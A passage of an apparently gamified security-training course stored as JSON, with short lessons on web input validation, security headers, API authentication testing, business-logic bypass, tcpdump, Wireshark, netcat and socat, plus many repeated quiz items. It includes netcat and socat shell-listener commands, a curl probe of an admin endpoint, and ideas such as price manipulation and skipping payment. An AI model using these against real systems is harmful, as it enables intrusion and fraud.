rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"g-w-input-validation","cat":"Web Application","title":"Input Validation Best Practices","diff":1,"xp":75,"intro":"Validate, sanitize, and encode all user input.","sections":[{"type":"text","content":"Validate, sanitize, and encode all user input."},{"type":"code","lang":"bash","content":"# Validation: check format (email, number, date)\n# Sanitization: remove dangerous characters\n# Encoding: transform for safe output\n# Whitelist > Blacklist\n# Server-side always (client-side is optional)"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Validation should happen on...","opts":["Client-side only","Server-side always (client-side optional)","Both equally","Neither"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"g-w-broken-logic","cat":"Web Application","title":"Business Logic Bypass","diff":3,"xp":200,"intro":"Exploit flawed application logic.","sections":[{"type":"text","content":"Exploit flawed application logic."},{"type":"code","lang":"bash","content":"# Negative quantity: get refund for purchase\n# Skip payment step: jump to order confirmation\n# Price manipulation: change hidden price field\n# Race condition: redeem coupon simultaneously\n# Workflow bypass: submit form out of order"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Business logic bugs are found by...","opts":["Automated scanning","Understanding intended flow and testing deviations","Port scanning","Brute force"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"g-w-http-headers-sec","cat":"Web Application","title":"HTTP Security Headers Guide","diff":1,"xp":75,"intro":"Essential security headers for web applications.","sections":[{"type":"text","content":"Essential security headers for web applications."},{"type":"code","lang":"bash","content":"Content-Security-Policy: default-src 'self'\nStrict-Transport-Security: max-age=31536000; includeSubDomains\nX-Frame-Options: DENY\nX-Content-Type-Options: nosniff\nReferrer-Policy: strict-origin-when-cross-origin"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"HSTS prevents...","opts":["XSS","Protocol downgrade from HTTPS to HTTP","CSRF","SQL injection"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"g-w-api-auth","cat":"Web Application","title":"API Authentication Testing","diff":2,"xp":150,"intro":"Test API authentication mechanisms for weaknesses.","sections":[{"type":"text","content":"Test API authentication mechanisms for weaknesses."},{"type":"code","lang":"bash","content":"# No auth: try accessing endpoints without credentials\n# Weak tokens: try JWT none, weak secrets\n# Broken object-level auth: change IDs\n# API key exposure: check JS, mobile apps\ncurl -H 'Authorization: Bearer invalid' https://api.target.com/admin"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"The most common API auth issue is...","opts":["Strong passwords","Broken object-level authorization (IDOR)","Missing encryption","Rate limiting"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"g-n-tcpdump","cat":"Network Attacks","title":"tcpdump Packet Capture","diff":1,"xp":75,"intro":"Capture and filter network traffic from the command line.","sections":[{"type":"text","content":"Capture and filter network traffic from the command line."},{"type":"code","lang":"bash","content":"tcpdump -i eth0 -w capture.pcap\ntcpdump -i eth0 port 80 -A  # show ASCII\ntcpdump -i eth0 host 10.10.10.5 -nn"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"tcpdump -A shows packets as...","opts":["Hex","ASCII (human-readable)","Binary","JSON"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"g-n-wireshark-filter","cat":"Network Attacks","title":"Wireshark Display Filters","diff":1,"xp":75,"intro":"Filter captured traffic to find specific packets.","sections":[{"type":"text","content":"Filter captured traffic to find specific packets."},{"type":"code","lang":"bash","content":"ip.addr == 10.10.10.5\ntcp.port == 80\nhttp.request.method == POST\ndns.qry.name contains 'target'\ntcp.flags.syn == 1 and tcp.flags.ack == 0"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"Wireshark display filters affect...","opts":["Capture","What's displayed (not what's captured)","Storage","Network speed"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration Test Mode","Managed Internet Traffic Monitor"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"g-n-netcat-usage","cat":"Network Attacks","title":"Netcat Swiss Army Knife","diff":1,"xp":75,"intro":"Connect, listen, transfer files, and create shells.","sections":[{"type":"text","content":"Connect, listen, transfer files, and create shells."},{"type":"code","lang":"bash","content":"nc -nlvp 4444  # listen\nnc target 4444  # connect\nnc -nlvp 9999 < file.txt  # serve file\nnc target 9999 > received.txt  # download"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"Netcat can be used as a...","opts":["Firewall","Port scanner, file transfer, and reverse shell listener","DNS server","Web server"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration Test Mode","Managed Internet Traffic Monitor"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"g-n-socat","cat":"Network Attacks","title":"Socat Advanced Usage","diff":2,"xp":150,"intro":"Socat is netcat on steroids \u2014 bidirectional data relay.","sections":[{"type":"text","content":"Socat is netcat on steroids \u2014 bidirectional data relay."},{"type":"code","lang":"bash","content":"socat TCP-LISTEN:8080,reuseaddr,fork TCP:target:80\nsocat - OPENSSL:target:443\nsocat FILE:`tty`,raw,echo=0 TCP-LISTEN:4444"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"Socat 